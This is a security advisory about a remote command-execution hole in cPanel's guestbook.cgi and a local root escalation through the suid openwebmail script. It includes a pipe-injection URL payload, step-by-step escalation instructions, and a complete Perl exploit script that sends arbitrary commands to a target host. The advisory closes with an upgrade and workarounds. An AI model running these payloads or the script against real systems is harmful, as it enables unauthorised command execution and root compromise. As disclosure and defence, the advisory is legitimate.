COMMAND

	Cpanel remote command execution and local root vulnerabilities

SYSTEMS AFFECTED

	Cpanel 5 and below

PROBLEM

	In    pokleyzz    [pokleyzz_at_scan-associates.net]    advisory     with
	contributions   of   sk   [sk_at_scan-associates.net]    and    shaharil
	[shaharil_at_scan-associates.net],   special   thanks    to    Skywizard
	[skywizard_at_mybsd.org.my] :
	
	Cpanel is web hosting control panel which allow client manage their  web
	account through web interface. Most of the application  are  written  in
	perl and  compiled to binary.
	
	 Details
	 =======
	
	There is multiple vurnerabilities in this package as describe below.
	
	1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
	
	There is classic perl open function vulnerability in  template  variable
	which allow any user to read any file or run  command  as  valid  system
	user which assign to specific url in apache configuration.
	
	proof of concept:
	
	    http://[your site.com]/cgi-sys/guestbook.cgi?user=cpanel&template=|[command]|
	
	
	2) Local privileges escalation (root)
	
	Cpanel come with openwebmail packages as one of web  base  email  reader
	which suid root. In the system with suid perl  install  perfectly  (with
	suid mode turn on) local user may include their  own  perl  script  when
	running openwebmail script (oom) through suidperl.
	
	Openwebmail   will   append   perl   include   path    (@INC)    through
	SCRIPT_FILENAME  environment  variable,  then  include  some  file  when
	execute.
	
	/usr/local/cpanel/base/openwebmail/oom line 14
	
	if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
	if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
	push (@INC, $SCRIPT_DIR, ".");
	.
	.
	.
	require "openwebmail-shared.pl";
	
	proof of concept:
	
		i)	Create file openwebmail-shared.pl contain perl script you want to execute.
		ii)	Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.  
		iii)	exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
	
	
	 Update (24 February 2003)
	 ======
	
	cyzek [evilcow@ig.com.br] exploit :
	
	#!/usr/bin/perl
	#
	# ------- start here -------
	#
	# Bug Founded by: pokleyzz
	#
	# Cpanel is web hosting control panel which allow client manage their web account through
	# web interface. Most of the application are written in perl and  compiled to binary. 
	#
	# Details
	# =======
	# There is multiple vurnerabilities in this package as describe below.
	# 
	# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
	# 
	# There is classic perl open function vulnerability in template variable which allow any 
	# user to read any file or run command  as valid system user which assign to specific url 
	# in apache configuration.
	#
	# 2) Local privileges escalation (root)
	#
	# Cpanel come with openwebmail packages as one of web base email reader which suid root.
	# In the system with suid perl install perfectly (with suid mode turn on) local user may 
	# include their own perl script when running openwebmail script (oom) through suidperl.
	#
	# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
	# then include some file when execute.
	#
	# /usr/local/cpanel/base/openwebmail/oom line 14
	#
	# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
	# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
	# push (@INC, $SCRIPT_DIR, ".");
	# .
	# .
	# .
	# require "openwebmail-shared.pl";
	#
	# proof of concept:
	# i) Create file openwebmail-shared.pl contain perl script you want to execute.
	# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.  
	# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
	#
	# -------- cut here --------
	#
	# coded by cyzek. cyzek@efnet
	# thanks for p0ng p0ng@brasnet.org
	 
	$url = $ARGV[0];
	$cmd = $ARGV[1];
	
	if(@ARGV != 2){
		print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
		print " use %20 for spaces.\n";
		print " usage: $0 <host> <cmd>\n";
		exit;
	}
	
	use IO::Socket::INET;
	$rem = IO::Socket::INET->new(
	Proto       => "tcp",
	PeerAddr    => $url,
	PeerPort    => "80");
	
	if ($rem) { 
		print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
		@resp = <$rem>;
	}
	print "@resp\n\n";
	

SOLUTION

	Get CPanel 6
	
	 Workaround
	 ==========
	
	 i) Remove /usr/local/cpanel/cgi-sys/guestbook.cgi. 
	
	 ii) Turn off suid mode in oom script 
	     (chmod 755 /usr/local/cpanel/base/openwebmail/oom).